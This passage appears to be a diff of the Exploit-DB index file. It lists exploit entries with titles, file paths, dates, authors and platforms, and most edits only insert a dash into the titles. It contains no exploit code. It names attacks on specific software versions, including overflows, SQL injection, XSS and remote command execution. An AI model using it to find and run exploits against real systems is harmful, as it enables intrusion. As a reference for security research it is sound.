PoC",2012-10-15,Dark-Puzzle,windows,dos,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 @@ -19259,25 +19255,25 @@ id,file,description,date,author,platform,type,port 21994,platforms/windows/local/21994.rb,"Windows - Escalate Service Permissions Local Privilege Escalation",2012-10-16,Metasploit,windows,local,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 Non-existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 -21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 +21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 - DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 21998,platforms/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,linux,remote,0 21999,platforms/windows/remote/21999.txt,"Perception LiteServe 2.0.1 - Directory Query String Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0 -22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 +22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 -22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 +22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 22010,platforms/multiple/dos/22010.txt,"Hotfoon Dialer 4.0 - Buffer Overflow",2002-11-11,"S G Masood",multiple,dos,0 22011,platforms/linux/dos/22011.c,"ISC BIND 8.3.x - OPT Record Large UDP Denial of Service",2002-11-12,spybreak,linux,dos,0 22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0 22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0 22014,platforms/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",linux,local,0 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0 -22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 +22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0 22018,platforms/windows/remote/22018.pl,"keyfocus kf Web server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0 22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service",2002-11-14,"securma massine",windows,dos,0 @@ -19292,7 +19288,7 @@ id,file,description,date,author,platform,type,port 22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 - Command Execution",2002-11-21,"Last Stage of Delirium",windows,remote,0 22029,platforms/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",multiple,remote,0 22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x - Memberlist.php Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 -22031,platforms/unix/dos/22031.txt,"Rational ClearCase 4.1 Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",unix,dos,0 +22031,platforms/unix/dos/22031.txt,"Rational ClearCase 4.1 - Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",unix,dos,0 22032,platforms/windows/remote/22032.txt,"acFTP 1.4 - Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",windows,remote,0 22033,platforms/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",linux,dos,0 22034,platforms/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",linux,remote,0 @@ -19314,23 +19310,23 @@ id,file,description,date,author,platform,type,port 22050,platforms/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - imageFolio.cgi direct Parameter XSS",2002-11-27,SecurityTracker.com,cgi,webapps,0 22051,platforms/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi XSS",2002-11-27,SecurityTracker.com,cgi,webapps,0 22052,platforms/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps,0 -22053,platforms/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 POST Handler Buffer Overflow",2002-11-29,"Matthew Murphy",multiple,dos,0 +22053,platforms/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 - POST Handler Buffer Overflow",2002-11-29,"Matthew Murphy",multiple,dos,0 22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 - index.cgi Buffer Overrun",2002-11-29,BrainStorm,cgi,remote,0 -22055,platforms/linux/local/22055.txt,"SuidPerl 5.6 Information Disclosure",2002-11-29,zen-parse,linux,local,0 +22055,platforms/linux/local/22055.txt,"SuidPerl 5.6 - Information Disclosure",2002-11-29,zen-parse,linux,local,0 22056,platforms/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow",2002-11-30,"Matthew Murphy",linux,dos,0 22057,platforms/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote,0 22058,platforms/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote,0 22059,platforms/linux/dos/22059.pl,"Pserv 2.0 - HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos,0 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 -22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 +22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 -22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 +22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 @@ -19340,7 +19336,7 @@ id,file,description,date,author,platform,type,port 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 -22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 +22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow",2002-12-10,"Joel Soderberg",windows,remote,0 22083,platforms/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting",2002-12-12,"Ory Segal",php,webapps,0 22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0 @@ -19369,7 +19365,7 @@ id,file,description,date,author,platform,type,port 22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 - EditForm.php Cross-Site Scripting",2002-12-22,xatr0z,php,webapps,0 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - Modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 - Shadow File Disclosure",2002-12-22,"Victor Pereira",cgi,webapps,0 -22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0 +22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0 22114,platforms/php/webapps/22114.txt,"PEEL 1.0 b - Remote File Inclusion",2002-12-31,frog,php,webapps,0 22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - menu.inc.php c_path Parameter RFI",2003-01-02,frog,php,webapps,0 @@ -19387,29 +19383,29 @@ id,file,description,date,author,platform,type,port 22127,platforms/php/webapps/22127.txt,"DCP-Portal 5.0.1 - lib.php Root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Local Root Exploit",2003-01-06,"Carl Livitt",linux,local,0 22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0 -22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0 +22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0 22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,windows,dos,0 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - Default_Theme Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote,0 -22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal",2003-01-07,"Dennis Rand",windows,remote,0 -22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 +22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 - Dot-Dot-Slash Directory Traversal",2003-01-07,"Dennis Rand",windows,remote,0 +22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,multiple,remote,0 22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,multiple,remote,0 22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,multiple,remote,0 22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String",2003-01-10,greuff,linux,remote,0 22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String",2003-01-10,greuff,windows,remote,0 -22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0 -22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 -22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution",2003-01-11,"Maurycy Prodeus ",multiple,remote,0 +22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 - MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0 +22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 - Relative Path Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 +22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 - Daemon Mode Remote Command Execution",2003-01-11,"Maurycy Prodeus ",multiple,remote,0 22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE - Reminder.php SQL Injection",2003-01-12,"VOID.AT Security",php,webapps,0 -22147,platforms/linux/remote/22147.c,"mpg123 pre0.59s Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",linux,remote,0 +22147,platforms/linux/remote/22147.c,"mpg123 pre0.59s - Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",linux,remote,0 22148,platforms/php/webapps/22148.txt,"phpPass 2 - AccessControl.php SQL Injection",2003-01-13,frog,php,webapps,0 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - index.php bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 -22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en Stored XSS",2012-10-22,sqlhacker,php,webapps,0 +22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Stored XSS",2012-10-22,sqlhacker,php,webapps,0 22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - (index.php task parameter) SQL Injection",2012-10-22,D4NB4R,php,webapps,0 22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - (index.php search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 @@ -19419,7 +19415,7 @@ id,file,description,date,author,platform,type,port 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow",2012-10-23,Metasploit,windows,remote,21 -22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 +22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 - users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 - comment.php cid Parameter XSS",2003-01-14,snooq,php,webapps,0 @@ -19430,18 +19426,18 @@ id,file,description,date,author,platform,type,port 22170,platforms/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - Psunami.CGI Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps,0 22171,platforms/windows/remote/22171.txt,"Trend Micro OfficeScan 3.x - CGI Directory Insufficient Permissions",2003-01-15,"Rod Boron",windows,remote,0 22172,platforms/windows/dos/22172.txt,"Trend Micro Virus Control System 1.8 - Denial of Service",2003-01-15,"Rod Boron",windows,dos,0 -22173,platforms/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 Information Disclosure",2003-01-15,"Rod Boron",windows,remote,0 +22173,platforms/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 - Information Disclosure",2003-01-15,"Rod Boron",windows,remote,0 22174,platforms/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass",2003-01-15,"Rod Boron",windows,remote,0 22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - help.php Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0 22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - edit.php SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946 b Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 -22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 +22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 -22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 +22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 @@ -19453,7 +19449,7 @@ id,file,description,date,author,platform,type,port 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 - Archive File Extension Buffer Overrun",2003-01-22,nesumin,windows,local,0 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,php,webapps,0 -22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 +22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 @@ -19468,24 +19464,24 @@ id,file,description,date,author,platform,type,port 22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Inclusion",2003-02-03,frog,php,webapps,0 22209,platforms/php/webapps/22209.txt,"phpMyShop 1.0 - compte.php SQL Injection",2003-02-03,frog,php,webapps,0 22210,platforms/openbsd/local/22210.txt,"OpenBSD 2.x/3.x - CHPass Temporary File Link File Content Revealing",2003-02-03,"Marc Bevand",openbsd,local,0 -22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 Avatar HTML Injection",2003-02-03,delusion,php,webapps,0 +22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0 22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0 -22213,platforms/windows/remote/22213.txt,"Opera 7.0 JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0 +22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash PoC",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Office Word 2010 - Crash PoC",2012-10-24,coolkaveh,windows,dos,0 -22217,platforms/windows/remote/22217.txt,"Opera 7 Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0 -22218,platforms/windows/remote/22218.txt,"Opera 7.0 History Object Information Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 +22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0 +22218,platforms/windows/remote/22218.txt,"Opera 7.0 - History Object Information Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 22219,platforms/windows/remote/22219.txt,"Opera 7.0 - Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 -22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 +22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 22221,platforms/windows/dos/22221.pl,"Electrasoft 32Bit FTP 9.49.1 - Client Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 22222,platforms/php/webapps/22222.txt,"TOPO 1.41 - Remote Path Disclosure",2003-02-04,"Rynho Zeros Web",php,webapps,0 -22223,platforms/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 Client Unreal URL Denial of Service",2003-02-05,"Auriemma Luigi",multiple,dos,0 -22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote,0 +22223,platforms/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service",2003-02-05,"Auriemma Luigi",multiple,dos,0 +22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote,0 22225,platforms/windows/local/22225.txt,"Microsoft Windows XP - Redirector Privilege Escalation",2003-02-05,Nsfocus,windows,local,0 22226,platforms/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote,0 22227,platforms/cgi/webapps/22227.txt,"FileSeek CGI Script - Remote Command Execution",2002-04-16,"Thijs Bosschert",cgi,webapps,0 22228,platforms/cgi/webapps/22228.txt,"FileSeek - CGI Script File Disclosure",2002-04-16,"Thijs Bosschert",cgi,webapps,0 -22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0 +22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0 22230,platforms/multiple/dos/22230.pl,"Netscape Enterprise Server 4.1 - HTTP Method Name Buffer Overflow",2001-05-19,"Robert Cardona",multiple,dos,0 22231,platforms/hp-ux/local/22231.txt,"HPUX 10.20/11 Wall Message Buffer Overflow",2003-02-07,Scotty,hp-ux,local,0 22232,platforms/windows/dos/22232.txt,"Microsoft Windows XP - HCP URI Buffer Overflow",2001-11-21,mozoral,windows,dos,0 @@ -19504,8 +19500,8 @@ id,file,description,date,author,platform,type,port 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 -22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 -22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server Denial of Service",1999-05-08,wh00t,multiple,dos,0 +22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 +22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps,0 22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - System.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 @@ -19526,27 +19522,27 @@ id,file,description,date,author,platform,type,port 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - Links.php Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 22269,platforms/windows/remote/22269.txt,"Sage 1.0 beta 3 - Content Management System Path 